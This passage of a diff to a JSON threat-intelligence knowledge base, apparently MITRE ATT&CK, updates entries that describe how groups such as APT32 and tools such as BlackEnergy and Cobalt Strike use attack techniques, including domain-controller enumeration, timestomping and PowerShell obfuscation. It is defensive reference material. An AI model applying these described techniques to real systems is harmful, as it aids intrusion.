"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896"
},
{
"id": "relationship--e0301b36-c339-49c5-b257-9ece19152922",
@@ -54891,13 +55890,13 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) used the net view command to show all shares available, including the administrative shares such as C$ and ADMIN$. [APT32](https://attack.mitre.org/groups/G0050) also used the ping command.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has enumerated DC servers using the command net group \"Domain Controllers\" /domain. The group has also used the ping command.(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--a6080757-7935-439b-b70f-72ba841cda03",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.870Z",
+ "modified": "2020-06-29T16:54:25.889Z",
"created": "2019-01-31T01:07:58.596Z"
},
{
@@ -54958,7 +55957,7 @@
{
"id": "relationship--71a8ae5e-3a78-49b5-9857-e202d636cedf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used scheduled task raw XML with a backdated timestamp of June 2, 2016.(Citation: FireEye APT32 May 2017) The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll.(Citation: ESET OceanLotus Mar 2019) Additionally, [APT32](https://attack.mitre.org/groups/G0050) has used a random value to modify the timestamp of the file storing the clientID.(Citation: ESET OceanLotus macOS April 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used scheduled task raw XML with a backdated timestamp of June 2, 2016. The group has also set the creation time of the files dropped by the second stage of the exploit to match the creation time of kernel32.dll. Additionally, [APT32](https://attack.mitre.org/groups/G0050) has used a random value to modify the timestamp of the file storing the clientID.(Citation: FireEye APT32 May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -54983,7 +55982,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.917Z",
+ "modified": "2020-06-19T20:04:12.444Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -55030,7 +56029,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"type": "relationship",
- "modified": "2020-03-29T19:34:19.721Z",
+ "modified": "2020-06-20T22:39:47.666Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -55089,7 +56088,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -55098,7 +56097,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.178Z",
+ "modified": "2020-04-16T19:41:40.590Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -55125,7 +56124,7 @@
{
"id": "relationship--db91e39d-daa4-4f9c-a7a6-be67eba712d2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. [APT32](https://attack.mitre.org/groups/G0050) has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC).(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019) [APT32](https://attack.mitre.org/groups/G0050) also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: ESET OceanLotus macOS April 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. [APT32](https://attack.mitre.org/groups/G0050) has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC). [APT32](https://attack.mitre.org/groups/G0050) also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor.(Citation: FireEye APT32 May 2017)(Citation: GitHub Invoke-Obfuscation)(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -55170,7 +56169,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-07-17T13:11:37.973Z",
+ "modified": "2020-06-19T20:04:12.434Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -55585,7 +56584,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
- "modified": "2020-03-24T15:40:47.081Z",
+ "modified": "2020-05-26T19:21:26.074Z",
"created": "2017-05-31T21:33:27.017Z"
},
{
@@ -55620,14 +56619,14 @@
"target_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.320Z",
+ "modified": "2020-04-16T19:41:40.594Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -56053,9 +57052,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -56067,7 +57066,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.715Z",
+ "modified": "2020-06-02T16:14:00.613Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -56189,7 +57188,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -56198,7 +57197,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"type": "relationship",
- "modified": "2020-03-17T00:01:40.901Z",
+ "modified": "2020-04-16T19:41:40.514Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -56283,17 +57282,17 @@
"description": "Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018."
}
],
- "source_ref": "malware--cf8df906-179c-4a78-bd6e-6605e30f6624",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2019-01-30T13:42:09.719Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--cf8df906-179c-4a78-bd6e-6605e30f6624",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--baf31b81-e175-49e3-b2d9-d7552ea902a1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1086) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses character replacement, [PowerShell](https://attack.mitre.org/techniques/T1059/001) environment variables, and XOR encoding to obfuscate code. [POWERSTATS](https://attack.mitre.org/software/S0223)'s backdoor code is a multi-layer obfuscated, encoded, and compressed blob. (Citation: FireEye MuddyWater Mar 2018)(Citation: ClearSky MuddyWater Nov 2018) [POWERSTATS](https://attack.mitre.org/software/S0223) has used PowerShell code with custom string obfuscation (Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -56307,13 +57306,18 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-04-22T22:36:52.967Z",
+ "modified": "2020-05-18T19:37:52.431Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -56889,7 +57893,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -56898,7 +57902,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.206Z",
+ "modified": "2020-04-16T19:41:40.499Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -56995,7 +57999,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91",
"type": "relationship",
- "modified": "2019-07-25T11:14:24.285Z",
+ "modified": "2020-07-14T19:43:38.274Z",
"created": "2017-05-31T21:33:27.028Z"
},
{
@@ -58037,12 +59041,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-2843-99"
}
],
- "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--045d0922-2310-4e60-b5e4-3302302cb3c5"
},
{
"id": "relationship--25d4fa6d-4f88-4604-8b9f-cce6f3b5ae4d",
@@ -58156,12 +59160,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--30489451-5886-4c46-90c9-0dff9adc5252",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--1a4c94a1-6362-42b3-b1d9-41ae3fbf5ea5",
@@ -58324,16 +59328,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2020-03-17T00:28:01.556Z",
+ "modified": "2020-04-21T23:09:31.069Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -58478,16 +59482,16 @@
],
"external_references": [
{
- "url": "https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf",
+ "source_name": "NorthSec 2015 GData Uroburos Tools",
"description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.",
- "source_name": "NorthSec 2015 GData Uroburos Tools"
+ "url": "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html"
}
],
"source_ref": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"relationship_type": "uses",
"target_ref": "attack-pattern--bc0f5e80-91c0-4e04-9fbb-e4e332c85dae",
"type": "relationship",
- "modified": "2020-03-20T16:39:42.427Z",
+ "modified": "2020-06-29T13:26:01.388Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -58661,16 +59665,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.096Z",
+ "modified": "2020-05-14T15:14:33.564Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -58933,27 +59936,32 @@
{
"id": "relationship--2c586158-d02b-468a-bee8-04e1bde320e1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)",
+ "description": "[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
"description": "Baumgartner, K. and Garnaeva, M.. (2014, November 3). BE2 custom plugins, router abuse, and target profiles. Retrieved March 24, 2016.",
"url": "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/"
+ },
+ {
+ "source_name": "ESET BlackEnergy Jan 2016",
+ "url": "https://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/",
+ "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry . Retrieved June 10, 2020."
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.719Z",
+ "modified": "2020-06-10T21:56:44.858Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -58966,7 +59974,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2020-03-29T21:07:11.941Z",
+ "modified": "2020-07-09T14:42:23.257Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -59303,16 +60311,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.710Z",
+ "modified": "2020-06-02T16:14:00.924Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -59360,7 +60368,7 @@
{
"id": "relationship--cfc92bbe-4a8b-47ec-b12d-d08fdcea1fbb",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) gathers the computer name and checks the OS version to ensure it doesn\u2019t run on a Windows XP or Windows Server 2003 systems.(Citation: Talos ROKRAT)(Citation: Talos ROKRAT 2)(Citation: Securelist ScarCruft May 2019)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -59376,16 +60384,21 @@
"source_name": "Talos ROKRAT 2"
},
{
- "source_name": "Securelist ScarCruft May 2019",
+ "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019.",
"url": "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/",
- "description": "GReAT. (2019, May 13). ScarCruft continues to evolve, introduces Bluetooth harvester. Retrieved June 4, 2019."
+ "source_name": "Securelist ScarCruft May 2019"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.319Z",
+ "modified": "2020-05-21T17:07:02.534Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -59684,7 +60697,7 @@
{
"id": "relationship--1b51b49a-1f3a-4b5d-aea3-989e9ccb72ad",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)",
+ "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -59693,13 +60706,23 @@
"url": "https://cobaltstrike.com/downloads/csmanual38.pdf",
"description": "Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.",
"source_name": "cobaltstrike manual"
+ },
+ {
+ "url": "https://www.cobaltstrike.com/downloads/reports/tacticstechniquesandprocedures.pdf",
+ "description": "Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.",
+ "source_name": "Cobalt Strike TTPs Dec 2017"
+ },
+ {
+ "source_name": "CobaltStrike Daddy May 2017",
+ "url": "https://blog.cobaltstrike.com/2017/05/23/cobalt-strike-3-8-whos-your-daddy/",
+ "description": "Mudge, R. (2017, May 23). Cobalt Strike 3.8 \u2013 Who\u2019s Your Daddy?. Retrieved June 4, 2019."
}
],
"source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-06-06T19:04:39.286Z",
+ "modified": "2020-06-23T19:49:20.579Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -59796,7 +60819,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--d40239b3-05ff-46d8-9bdd-b46d13463ef9",
"type": "relationship",
- "modified": "2019-07-24T19:35:08.287Z",
+ "modified": "2020-07-14T19:36:40.744Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -59809,7 +60832,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81",
"type": "relationship",
- "modified": "2020-03-23T20:59:39.884Z",
+ "modified": "2020-06-20T22:44:36.250Z",
"created": "2017-05-31T21:33:27.025Z"
},
{
@@ -60001,7 +61024,7 @@
{
"id": "relationship--1332e859-38be-45ed-9ebc-09efd7117c17",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[FIN7](https://attack.mitre.org/groups/G0046) used SQL and JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)",
+ "description": "[FIN7](https://attack.mitre.org/groups/G0046) used SQL scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -60026,7 +61049,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
"type": "relationship",
- "modified": "2020-03-17T19:00:50.437Z",
+ "modified": "2020-06-24T19:04:40.545Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -61476,16 +62499,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.709Z",
+ "modified": "2020-06-02T16:14:00.621Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -61552,7 +62575,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -61561,7 +62584,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.205Z",
+ "modified": "2020-04-16T19:41:40.586Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -61793,7 +62816,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
"type": "relationship",
- "modified": "2019-07-24T14:34:51.623Z",
+ "modified": "2020-03-31T22:18:43.131Z",
"created": "2017-05-31T21:33:27.030Z"
},
{
@@ -61824,12 +62847,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2"
},
{
"id": "relationship--bc8f14a1-dc24-42cb-a0dd-3cc0c25d5eae",
@@ -61840,16 +62863,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-19T19:41:33.765Z",
+ "modified": "2020-04-21T23:09:31.059Z",
